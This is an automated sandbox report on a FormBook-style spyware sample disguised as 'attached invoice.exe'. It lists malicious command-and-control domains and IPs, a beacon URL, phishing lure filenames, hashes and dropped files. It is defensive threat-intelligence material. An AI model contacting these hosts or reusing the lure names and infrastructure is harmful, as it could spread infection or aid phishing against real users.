                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.ecosia.org/newtab/cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.google.com/favicon.icocacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.domainnameshop.com/RAVCpl64.exe, 00000005.00000002.816303830162.00000000091E2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://codepen.io/uzcho_/pens/popular/?grid_type=listRAVCpl64.exe, 00000005.00000002.816303830162.0000000007F0A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003C7A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.dymar.shop/index.php?route=error/not_found&amp;6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Olcacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.hostgator.com.brRAVCpl64.exe, 00000005.00000002.816303830162.0000000008B9A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.000000000490A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://codepen.io/uzcho_/pen/eYdmdXw.cssRAVCpl64.exe, 00000005.00000002.816303830162.0000000007F0A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003C7A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.dymar.shop/index.php?route=information/contactcacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.dymar.shop/index.php?route=account/return/addRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.aapanel.com/new/download.html?invite_code=aapaneleRAVCpl64.exe, 00000005.00000002.816303830162.00000000086E4000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816303830162.00000000083C0000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816303830162.000000000822E000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004130000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004454000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.kmmm759j.sbsRAVCpl64.exe, 00000005.00000002.816281337320.00000000007E2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              http://localhost/arkanoid_server/requests.phpRAVCpl64.exe, 00000005.00000002.816303830162.000000000766C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.812027451114.000000000606C000.00000004.80000000.00040000.00000000.sdmp, attached invoice.exefalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.dymar.shop/index.php?route=account/newsletterRAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://gemini.google.com/app?q=cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  13.248.169.48
                                                                                                  		www.aktmarket.xyzUnited States
                                                                                                  		16509AMAZON-02UStrue
                                                                                                  104.21.7.187
                                                                                                  		www.gk88top.topUnited States
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  103.230.159.86
                                                                                                  		superiorfencing.netAustralia
                                                                                                  		133159MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUtrue
                                                                                                  103.224.182.242
                                                                                                  		www.seeseye.websiteAustralia
                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                  84.32.84.32
                                                                                                  		techmiseajour.netLithuania
                                                                                                  		33922NTT-LT-ASLTtrue
                                                                                                  43.156.176.253
                                                                                                  		4hong.cnfol.beautyJapan4249LILLY-ASUStrue
                                                                                                  172.67.159.24
                                                                                                  		www.rafconstrutora.onlineUnited States
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  66.29.149.46
                                                                                                  		www.golivenow.liveUnited States
                                                                                                  		19538ADVANTAGECOMUStrue
                                                                                                  129.226.153.85
                                                                                                  		1hong.pels5zqo.shopSingapore
                                                                                                  		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                  74.208.236.156
                                                                                                  		www.christinascuties.netUnited States
                                                                                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                  31.31.196.17
                                                                                                  		www.bootleggersrt.onlineRussian Federation
                                                                                                  		197695AS-REGRUtrue
                                                                                                  185.68.16.160
                                                                                                  		www.dymar.shopUkraine
                                                                                                  		200000UKRAINE-ASUAtrue
                                                                                                  185.134.245.113
                                                                                                  		www.bahaeng.comNorway
                                                                                                  		12996DOMENESHOPOsloNorwayNOtrue
                                                                                                  3.33.130.190
                                                                                                  		iglpg.onlineUnited States
                                                                                                  		8987AMAZONEXPANSIONGBtrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1567213
                                                                                                  Start date and time:2024-12-03 09:44:29 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 16m 28s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                  Run name:Suspected Instruction Hammering
                                                                                                  Number of analysed new started processes analysed:7
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Sample name:attached invoice.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@16/14
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 97%
                                                                                                  • Number of executed functions: 69
                                                                                                  • Number of non-executed functions: 262
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                  Warnings

                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, assets.msn.com, self.events.data.microsoft.com, ctldl.windowsupdate.com, nexusrules.officeapps.live.com, api.msn.com
                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: attached invoice.exe

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  03:48:03API Interceptor25655455x Sleep call for process: cacls.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  13.248.169.48YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.tals.xyz/k1td/
                                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.optimismbank.xyz/98j3/
                                                                                                  lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.avalanchefi.xyz/ctta/
                                                                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.tals.xyz/k1td/
                                                                                                  PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.heliopsis.xyz/69zn/
                                                                                                  1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.gupiao.bet/t3a1/
                                                                                                  Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.hasan.cloud/tur7/
                                                                                                  CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.egyshare.xyz/lp5b/
                                                                                                  attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.aktmarket.xyz/wb7v/
                                                                                                  file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.gupiao.bet/t3a1/
                                                                                                  103.230.159.86A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.superiorfencing.net/bwyw/
                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.superiorfencing.net/bwyw/
                                                                                                  103.224.182.242YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/0mwe/
                                                                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/3iym/
                                                                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.madhf.tech/6ou6/
                                                                                                  Purchase Order PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • www.madhf.tech/6ou6/
                                                                                                  PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/3iym/
                                                                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/6ou6/
                                                                                                  Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.klohk.tech/3m3e/
                                                                                                  Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/0mwe/
                                                                                                  DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                  • www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq
                                                                                                  SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                  • www.madhf.tech/vpqb/

                                                                                                  Domains

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  www.aktmarket.xyzattached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 13.248.169.48
                                                                                                  Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 13.248.169.48
                                                                                                  VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 13.248.169.48
                                                                                                  www.seeseye.websiteDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                  • 103.224.182.242
                                                                                                  www.rafconstrutora.onlineOUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 104.21.34.103
                                                                                                  DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                  • 172.67.159.24
                                                                                                  need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 188.114.96.3
                                                                                                  www.dymar.shopTNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                                  • 185.68.16.160
                                                                                                  www.golivenow.liveattached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 66.29.149.46
                                                                                                  ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                  • 66.29.149.46
                                                                                                  www.christinascuties.netattached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                  • 74.208.236.156
                                                                                                  file.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 74.208.236.156

                                                                                                  ASNs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  MAMMOTHMEDIA-AS-APMammothMediaPtyLtdAUA2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 103.230.159.86
                                                                                                  A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 103.230.159.86
                                                                                                  https://astonishing-maize-sunstone.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                  • 103.1.185.157
                                                                                                  http://hrlaw.com.auGet hashmaliciousUnknownBrowse
                                                                                                  • 103.16.131.131
                                                                                                  http://coastiesmag.com.auGet hashmaliciousUnknownBrowse
                                                                                                  • 103.4.234.120
                                                                                                  TRe8oqmYKc.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 103.16.161.29
                                                                                                  cundi.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 103.16.161.29
                                                                                                  cundi.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 103.16.161.29
                                                                                                  cundi.x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 103.16.161.29
                                                                                                  cundi.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                  • 103.16.161.29
                                                                                                  AMAZON-02UShttps://bitbucket.org/ziphose/obmen/downloads/Doc.7zGet hashmaliciousRMSRemoteAdminBrowse
                                                                                                  • 185.166.143.49
                                                                                                  Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 13.227.8.72
                                                                                                  Recent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                  • 13.227.8.37
                                                                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                  • 13.248.169.48
                                                                                                  https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=pztuconjvsFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Furlz.fr/tiku#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 13.227.8.64
                                                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 54.171.230.55
                                                                                                  http://frame.wtfGet hashmaliciousUnknownBrowse
                                                                                                  • 44.238.68.12
                                                                                                  https://emailtransaction.com/?u=84775-2a97acb5884211437e2511ddc7c4e345386c33487a558c479c7af49e7f66170eGet hashmaliciousUnknownBrowse
                                                                                                  • 52.217.44.238
                                                                                                  agent.elfGet hashmaliciousUnknownBrowse
                                                                                                  • 54.171.230.55
                                                                                                  https://nahud.com/mailwizz-2.2.7/latest/index.php/campaigns/jm929ck1nc903/track-url/wh75022djq6fe/88db1e075fc0ca4d21e7c4fe4c14b76f34a46190Get hashmaliciousUnknownBrowse
                                                                                                  • 54.185.22.79
                                                                                                  CLOUDFLARENETUShttps://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.26.13.205
                                                                                                  https://web.goods-full.link/#/pages/recharge/components/order?type=usdtGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.66.212
                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                  • 104.21.16.9
                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.165.166
                                                                                                  cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.230.132
                                                                                                  HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.231.132
                                                                                                  dFezsjdHtg.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.230.132
                                                                                                  pjAYMCVbvK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.231.132
                                                                                                  MyLUNcS8wx.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 104.16.231.132
                                                                                                  Quarantined Messages-9.zipGet hashmaliciousUnknownBrowse
                                                                                                  • 104.17.25.14

                                                                                                  JA3 Fingerprints

                                                                                                  No context

                                                                                                  Dropped Files

                                                                                                  No context

                                                                                                  Created / dropped Files

                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\attached invoice.exe.log

                                                                                                  Download File
                                                                                                  Process:C:\Users\user\Desktop\attached invoice.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1378
                                                                                                  Entropy (8bit):5.383229417651261
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:ML9E4KG+1qE4DD30E4K6KDE4KhKzKhPKIE4oKXKoZAE4Kz9fhc84j:MxHKG+1qHDD30HK6YHKhSoPtHokhAHKg
                                                                                                  MD5:0C6917F1E76EBEA275472081BC96A4B1
                                                                                                  SHA1:F3106955924E1018B3C0E449368897113BC0442C
                                                                                                  SHA-256:669CCD2D7C3E58DF40AB95468BDEB8F2F6894A8E013766F05BAE86DFBE29BB13
                                                                                                  SHA-512:6A3B4A6B211274AC4C59A0835FF752F381B2DE3441E4F0A98DE372C8D88668B2EB89648302FD60EB91EE78FD5D780913F4B760CDACDE03CF4430B96C2B2AC142
                                                                                                  Malicious:true
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\6727d7bc35e330366d2e1724c31588d2\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\1832a65f299e4b6bb21796f03a62cbef\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\S

                                                                                                  C:\Users\user\AppData\Local\Temp\t577G2K6

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                                                                                  Category:dropped
                                                                                                  Size (bytes):229376
                                                                                                  Entropy (8bit):0.9085960794285802
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                                                                                  MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                                                                                  SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                                                                                  SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                                                                                  SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                                                                                  Malicious:false
                                                                                                  Reputation:low
                                                                                                  Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.8073361721864725
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  File name:attached invoice.exe
                                                                                                  File size:764'928 bytes
                                                                                                  MD5:d367df87fa58083dbd4a3e0337f3b1b8
                                                                                                  SHA1:8250a887a1a59913de5a1b8e461ad2bad73a7546
                                                                                                  SHA256:51f793789b534af84e377bfa1d9686038108885b89f05e3966e34ec31027f4e4
                                                                                                  SHA512:4168c9e8bad78efbc1416dd2dd7079eb5457c0896e9ea07ff877169a3edc70c9463f68cbac7944e4c7003f2c2d4f7ec2806ff7420bdf3212d9ff67614524e278
                                                                                                  SSDEEP:12288:WIR4R52J+XtdA615bgbHA2A96+ULdL6hdakPrGT6vQ6+uuoO4IV0qfx8IRi:WIeeyAFHAv96lV8dbPr46Yxz0qfx8I4
                                                                                                  TLSH:1BF4129C6956C406CF4416340F72F2B82BAC5ECEE911A2275FEDBDEBFC769252C44182
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-eNg..............0..T...T.......s... ........@.. ....................................@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:033424c4c199d839

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4b73c2
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x674E652D [Tue Dec 3 01:55:57 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb73700x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x4ca8.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
